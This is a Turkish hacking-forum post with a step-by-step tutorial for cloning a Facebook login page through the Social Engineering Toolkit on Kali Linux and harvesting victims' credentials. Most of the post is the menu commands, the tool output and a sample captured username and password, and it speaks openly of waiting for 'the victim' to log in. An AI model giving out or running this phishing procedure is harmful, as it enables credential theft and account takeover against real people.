İPUCU

Linux Linux İle İlgili Bilgi Paylaşım Platformu

Seçenekler

Kali Set Üzerinden Site Klonlama

hackertype - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2018
Nereden:
Sanal Alem
Mesajlar:
187
Konular:
42
Teşekkür (Etti):
26
Teşekkür (Aldı):
35
Ticaret:
(0) %
30-05-2018 00:59
#1
Post
Kali Set Üzerinden Site Klonlama
Merhaba arkadaşlar bugün bir yerden bulduğum makaleyi sizinle paylaşayım dedim bu yazım hergangi bir forumdan alıntı değil başka bir linux üzerine eğitimi veren siteden alınmıştır.
Bilmeyenler için faydalı olacağını düşündüm ve forumumuzda yer alsın dedim uzatmadan anlatıma geçelim.


Social Enginering Toolkit(SET) başlatıyoruz.
1.root@root:~# cd /pentest/exploits/set
root@root:/pentest/exploits/set# ./set


2. set > 2

3.set:webattack > 3

4.webattack > 2

5.set:webattack > kopyalamak istediğiniz site: https://www.facebook.com (Sizler başka siteler ekleyebilirsiniz.Ör:https://accounts.google.com) yazıp enter.

şöyle bir yazı çıkacaktır:[*] Cloning the website: https://login.facebook.com/login.php[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.[*] I have read the above message.[*]
Press {return} to continue. (enter tuşuna basın)

enter dedikten sonra şu yazı çıkacaktır. [*] Social-Engineer Toolkit Credential Harvester Attack[*] Credential Harvester is running on port 80[*] Information will be displayed to you as it arrives below:

Bu bölümde kurbanın oluşturduğumuz sahte adresimizi ziyaret etmesini bekliyoruz.Eğer adresimizi ziyaret eder ve login bilgilerini girerse kullanıcı adı ve parola ekrana yazdırılacaktır.

3.Adım:Şimdi oluşturduğumuz sahte adresi(http://172.16.244.128/) ziyaret edelim ve login olmaya çalışalım.

4.Adım:Gerçekleşen login girişimlerini ekranda görebilirsiniz.[*] WE GOT A HIT! Printing
the output:
PARAM: lsd=AVoZd6kS
PARAM: display=
PARAM: enable_profile_selector=
PARAM: legacy_return=1
PARAM: profile_selector_ids=
PARAM: trynum=1
PARAM: timezone=-120
PARAM: lgnrnd=081425_7Wct
PARAM: lgnjs=1420734563
POSSIBLE USERNAME FIELD FOUND: email=etik.backtrack
POSSIBLE PASSWORD FIELD FOUND: pass=etikbacktrack1453@
Oluşturduğunuz sahte web sitesinin adresini öğrenmek için terminalde "ifconfig" komutunu yazdırabilirsiniz.
---------------------
Gelecekte Bir Gün

Ddos Gibi Gir Damarlarıma
Layer 7 Gibi Tosla Duvara
Spoff Gibi Sersemlet Beni
Routing Aktif Olunca
Boşa Arama Beni
CH4M3, CasTieLa, zealen Teşekkür etti.
v0rxa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2018
Mesajlar:
960
Konular:
70
Teşekkür (Etti):
2
Teşekkür (Aldı):
155
Ticaret:
(0) %
05-06-2018 02:05
#2
Elinize sağlık

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı